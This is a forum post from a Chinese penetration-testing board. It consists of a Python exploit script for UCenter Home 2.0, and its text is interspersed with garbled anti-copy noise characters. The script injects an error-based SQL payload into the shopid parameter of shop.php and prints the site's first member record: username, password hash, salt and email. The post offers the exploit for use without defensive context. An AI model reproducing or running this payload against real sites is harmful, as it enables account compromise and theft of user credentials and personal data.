找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2707|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
% d9 |4 D# Y8 D2 U- ]: F" e
9 f; U" e2 g- A' q  d2 w/ g  e, ~) M& a4 e) n" b6 }, {, K% L+ d
#!/usr/bin/env python  
7 \3 L4 Y! {8 o' J3 \2 y * ?- C) B& Y" X7 F6 `. F: ?
import sys  
' D- T1 K8 W- Y, t2 Rimport urllib2  1 @# c8 Z) N& j- i$ W
import re  - ~6 L9 g$ S; E
  J! N# ~, Z4 E6 w) Q& ]  m9 q
def info():  4 l; e6 J) s8 X! z& Q
    print 'From:http://www.exploit-db.com/exploits/14997/' . l- s7 w1 {  W6 }- t; }; w
    print 'http://www.hake.cc/Web_loudong/'
. b) z+ P2 |. S- h/ S6 Y    print 'changed:qiaoy'  " h+ P# b( s: p: d; X
    print 'exp:'  + H8 ]* k1 e3 b' g: q
    print ' ./UCenter_Home_2.0.py site'  , }9 `6 H4 h/ S9 H
4 N2 p% E) a5 @2 n4 f2 L
def main():  
& K9 F/ v. N7 Q" T    if len(sys.argv) != 2:  
4 N7 B3 z. \1 `$ W: G        info()  
: X- J" p! P: t    else:  ; }4 M: O9 ^/ F- V# n  F, ]8 \5 R
        site = sys.argv[1]  
) O: L5 b/ y, ]% Y        if site[0:7] == 'http://':  2 P- h9 f+ D  s9 F6 a: v
            sitesite =site  
/ w! N' y' r7 K) ~) c+ e: z        elif site[0:8] == 'https://':  5 q: K) k7 r8 f1 I8 `
            sitesite = site  
/ e! ~$ c: e+ {8 p: a        else:  
4 i2 _/ z% h8 l! W2 C8 d            site = 'http://'+site  
, x% Z# E# y! X/ d8 o: \$ {        try:  
& K: S& S: t+ t; d8 _$ ~& x            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
! R  G8 {; s* @6 e/ Z4 u6 x            Value = urllib2.urlopen(url).read()  
& U2 Q4 Q- m6 x3 _" H            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
0 S! C: t3 g6 v, w, O( R4 _            hacked = Msg.split(':')  
$ z8 C' Y* S. H, @- u2 q            print 'Name:    '+hacked[1]  
& u% C1 Z  E+ K- X& I            print 'Passwd:  '+hacked[2]  3 ?. w- ~+ j5 _" w) P( j/ _
            print 'salt:    '+hacked[3]    ]8 u4 [# n9 X- p/ W* a
            print 'email:   '+hacked[4]  5 \' U& K8 G( [) {3 @: _' V9 j" j
        except:  ' Z! `, h( U+ Y7 i
            print 'Sorry,I can\'t work............'  0 ~. B- S; Y) U# l9 C1 v# q

1 b# u' |. I. v5 m2 }+ pif __name__ == '__main__':  
$ ]5 D- d2 X" r9 `" ]9 J& n' L    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表